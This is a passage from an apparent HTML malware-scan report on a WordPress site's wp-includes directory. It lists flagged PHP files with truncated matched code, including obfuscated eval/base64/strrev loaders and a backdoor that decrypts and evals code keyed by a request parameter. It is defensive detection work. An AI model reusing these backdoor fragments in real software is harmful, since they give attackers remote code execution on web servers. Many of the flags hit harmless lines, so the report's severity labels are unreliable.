</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 490</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">perms</span><span style="color: #007700">(</span><span style="color: #0000BB">$filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$check</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 508</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$perms</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 510</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"<font color=</span><span style="color: #0000BB">$color</span><span style="color: #DD0000">>"</span><span style="color: #007700">.</span><span style="color: #0000BB">$perms</span><span style="color: #007700">.</span><span style="color: #DD0000">"</font>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 512</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">CMS</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 515</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"Joomla!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 517</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"WordPress"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 519</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"Unknown"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 521</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">folder_separate</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 526</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$path2</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 529</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">side_bar</span><span style="color: #007700">(</span><span style="color: #0000BB">$make_file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 560</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">edit_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #0000BB">$current</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 62</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$files</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 96</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">del_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 99</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"file not exists"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str2 = '</span><span style="color: #007700">Array(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str3 = '</span><span style="color: #007700">@</span><span style="color: #0000BB">$isbot</span><span style="color: #DD0000">'; $search_str4 = '</span><span style="color: #007700">@require</span><span style="color: #DD0000">'; $search_str5 = '</span><span style="color: #007700">eval(</span><span style="color: #0000BB">gzuncompress</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str6 = '</span><span style="color: #007700">@include </span><span style="color: #DD0000">"\x2'; </span><span style="color: #0000BB">$search_str7</span><span style="color: #DD0000"> = '</span><span style="color: #0000BB">$OO</span><span style="color: #DD0000">'; </span><span style="color: #0000BB">$search_str8</span><span style="color: #DD0000"> = 'cache=00'; </span><span style="color: #0000BB">$search_str9</span><span style="color: #DD0000"> = 'file_get_contents(\"../index.php\")"'; $search_str10 = '</span><span style="color: #0000BB">is_uploaded_file</span><span style="color: #DD0000">'; $search_str11 = '</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #DD0000">'; $search_str12 = '</span><span style="color: #0000BB">multipart</span><span style="color: #007700">/</span><span style="color: #0000BB">form</span><span style="color: #007700">-</span><span style="color: #0000BB">data</span><span style="color: #DD0000">'; if (!file_exists($finderdata_path)) { $arr_php_file = findshells($_SERVER['</span><span style="color: #0000BB">DOCUMENT_</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 11413268 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 279</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 11413268)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 4a069524 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 294</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 4a069524)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">arr_php_file </span><span style="color: #007700">= </span><span style="color: #0000BB">findshells</span><span style="color: #007700">(</span><span style="color: #0000BB">$_SERVER</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 689d8acc <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 65</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 689d8acc)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">if (isset(</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'juke'</span><span style="color: #007700">]))
<br />{
<br /> </span><span style="color: #0000BB">$arr_files </span><span style="color: #007700">= </span><span style="color: #0000BB">DirFilesR</span><span style="color: #007700">(</span><span style="color: #0000BB">$_SERVER</span><span style="color: #007700">[</span><span style="color: #DD0000">'DOCUMENT_ROOT'</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_66").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/UhCIByfdPAq.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 51.75 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 19:29:40</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 19:29:40</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_67" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'OykpKSkpKSkpKSkpKSkpKSkpKSldODAwMDB4MFtd+KbLW1NMQUJPTEckKDVNaUUyRVZSbkFBZ1VwT1RfKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlfTspKSkpT0REc1Bnb18kKGxaWVZfKGs4ZmRHSktUV18kKGV0YWxmbml6Zyh2ZXJydHMgbnJ1dGVyO2s4ZmRHSktUV18kbGFib2xnO0pyWU42XyRsYWJvbGd7KU9ERHNQZ29fJCg1TWlFMkVWUm5BQWdVcE9UXyBub2l0Y251ZjtdNzAwMHgwW134pstbU0xBQk9MRyQ9azhmZEdKS1RXXyQ7XTYwMHgwW134pstbU0xBQk9MRyQ9SnJZTjZfJH07OUVZYm1fJCBucnV0ZXI7KSkpXTUweDBbXfimy1tTTEF...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">'; $MAIqK = '</span><span style="color: #0000BB">strrev</span><span style="color: #DD0000">'; ini_set('</span><span style="color: #0000BB">display_errors</span><span style="color: #DD0000">', 0); ini_set('</span><span style="color: #0000BB">error_log</span><span style="color: #DD0000">', NULL); error_reporting(0); ini_set('</span><span style="color: #0000BB">log_errors</span><span style="color: #DD0000">', 0); eval($MAIqK($eyxBz('</span><span style="color: #0000BB">OykpKSkpKSkpKSkpKSkpKSkpKSldODAwMDB4MFtd</span><span style="color: #007700">+</span><span style="color: #0000BB">KbLW1NMQUJPTEckKDVNaUUyRVZSbkFBZ1VwT1RfKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2Z</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$MAIqK</span><span style="color: #007700">(</span><span style="color: #0000BB">$eyxBz</span><span style="color: #007700">(</span><span style="color: #DD0000">'OykpKSkpKSkpKSkpKSkpKSkpKSldODAwMDB4MFtd+KbLW1NMQUJPTEckKDVNaUUyRVZSbkFBZ1VwT1RfKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlfTspKSkpT0REc1Bnb18kKGxaWVZfKGs4ZmRHSktUV18kKGV0YWxmbml6Zyh2ZXJydHMgbnJ1dGVyO2s4ZmRHSktUV18kbGFib2xnO0pyWU42XyRsYWJvbGd7KU9ERHNQZ29fJCg1TWlFMkVWUm5BQWdVcE9UXyBub2l0Y251ZjtdNzAwMHgwW134pstbU0xBQk9MRyQ9azhmZEdKS1RXXyQ7XTYwMHgwW134pstbU0xBQk9MRyQ9SnJZTjZfJH07OUVZYm1fJCBucnV0ZXI7KSkp...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function strrev eval_strrev <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">LavE</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign de12c454 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: de12c454)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">VJag</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_67").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/interactivity-api/interactivity-api/cache.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.52 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:04:45</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:04:45</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_68" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'soDfHdw/KKyA8tDerlkxsCZlEGvks3bh3wHe/xh7f+dXf0l64wnufe1u0yna92hPOUuf7wjO+l2ctmfUleRxrx+u2kmrhLFvfcyR3u/kdexDHqydPcxLn/2dS8+bX+oSN46B3qxbl8tGvO74TZfZiMyY9pxZv3FbZ9vvvM9oP6rbMjWlEqzfFtSA31MTOj0S/Zzn/hO1so/vYlzQEoXUOtIX2CzX+CMWHE4NSvACiSL2c80Wdl/TqK7rtpzUTDp/AZGfKTYDsT2u35AETKxNQBGEIHcMsn4ZYQI9czWmhlj9Vcc4+y/vYsOEzsWugQPloIM9pJu7H22bWQPpX9GA/3Hta8mPs58zuWxv9VZrWqa1dkJoFu2IerfLXb6XkRfOy//YsO/8GtZ+p/ebkOzrIUiRxWQ1c10bxqedaB9DtjKnMtEvEdhjYtO+bq6n4rfTdG6nQX1kaBagOoQGYDqGLykNsifCZ+ZEPinr7FczO7rJYcdphnt...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit global_var_string <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">qSaXe</span><span style="color: #007700">(</span><span style="color: #0000BB">$VkTQ</span><span style="color: #007700">) { </span><span style="color: #0000BB">$zgE </span><span style="color: #007700">= ${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}[</span><span style="color: #DD0000">"k"</span><span style="color: #007700">]; </span><span style="color: #0000BB">$qwpc </span><span style="color: #007700">= </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$zgE</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">16</span><span style="color: #007700">); </span><span style="color: #0000BB">$AYJ </span><span style="color: #007700">= </span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$VkTQ</span><span style="color: #007700">); return </span><span style="color: #0000BB">openssl_decrypt</span><span style="color: #007700">(</span><span style="color: #0000BB">$AYJ</span><span style="color: #007700">, </span><span style="color: #DD0000">"AES-256-CBC"</span><span style="color: #007700">, </span><span style="color: #0000BB">$zgE</span><span style="color: #007700">, </span><span style="color: #0000BB">OPENSSL_RAW_DATA</span><span style="color: #007700">, </span><span style="color: #0000BB">$qwpc</span><span style="color: #007700">); } if (</span><span style="color: #0000BB">qSaXe</span><span style="color: #007700">(</span><span style="color: #DD0000">'DjtPn+r4S0yvLCnquPz1fA'</span><span style="color: #007700">)){ echo </span><span style="color: #DD0000">'jXheuvJ8oyD7Ef/Tf8pxym61M6INZIPFsnEB</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$qSaXe</span><span style="color: #007700">)))); </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">htmlspecialchars_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">gzinflate</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$qSaXe</span><span style="color: #007700">))))</span>
</span>
</code></code></td></tr><tr><td><p><b>Function strrev eval_strrev <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">LAVe</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_68").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/LRBfCXwWtUu.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 51.75 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 21:51:10</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 21:51:10</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_69" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'OykpKSkpKSkpKSkpKSkpKSkpKSldODAwMDB4MFtd+KbLW1NMQUJPTEckKDVNaUUyRVZSbkFBZ1VwT1RfKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlfTspKSkpT0REc1Bnb18kKGxaWVZfKGs4ZmRHSktUV18kKGV0YWxmbml6Zyh2ZXJydHMgbnJ1dGVyO2s4ZmRHSktUV18kbGFib2xnO0pyWU42XyRsYWJvbGd7KU9ERHNQZ29fJCg1TWlFMkVWUm5BQWdVcE9UXyBub2l0Y251ZjtdNzAwMHgwW134pstbU0xBQk9MRyQ9azhmZEdKS1RXXyQ7XTYwMHgwW134pstbU0xBQk9MRyQ9SnJZTjZfJH07OUVZYm1fJCBucnV0ZXI7KSkpXTUweDBbXfimy1tTTEF...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">'; $MAIqK = '</span><span style="color: #0000BB">strrev</span><span style="color: #DD0000">'; ini_set('</span><span style="color: #0000BB">display_errors</span><span style="color: #DD0000">', 0); ini_set('</span><span style="color: #0000BB">error_log</span><span style="color: #DD0000">', NULL); error_reporting(0); ini_set('</span><span style="color: #0000BB">log_errors</span><span style="color: #DD0000">', 0); eval($MAIqK($eyxBz('</span><span style="color: #0000BB">OykpKSkpKSkpKSkpKSkpKSkpKSldODAwMDB4MFtd</span><span style="color: #007700">+</span><span style="color: #0000BB">KbLW1NMQUJPTEckKDVNaUUyRVZSbkFBZ1VwT1RfKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2Z</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$MAIqK</span><span style="color: #007700">(</span><span style="color: #0000BB">$eyxBz</span><span style="color: #007700">(</span><span style="color: #DD0000">'OykpKSkpKSkpKSkpKSkpKSkpKSldODAwMDB4MFtd+KbLW1NMQUJPTEckKDVNaUUyRVZSbkFBZ1VwT1RfKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlfTspKSkpT0REc1Bnb18kKGxaWVZfKGs4ZmRHSktUV18kKGV0YWxmbml6Zyh2ZXJydHMgbnJ1dGVyO2s4ZmRHSktUV18kbGFib2xnO0pyWU42XyRsYWJvbGd7KU9ERHNQZ29fJCg1TWlFMkVWUm5BQWdVcE9UXyBub2l0Y251ZjtdNzAwMHgwW134pstbU0xBQk9MRyQ9azhmZEdKS1RXXyQ7XTYwMHgwW134pstbU0xBQk9MRyQ9SnJZTjZfJH07OUVZYm1fJCBucnV0ZXI7KSkp...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function strrev eval_strrev <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">LavE</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign de12c454 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: de12c454)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">VJag</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_69").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/IXR/author_template_1769473402.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 15.03 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 02:23:44</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 02:23:44</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 22</span><br><table id="file_70" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 108</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$__</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 55</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$_</span><span style="color: #007700">}</span>
</span>
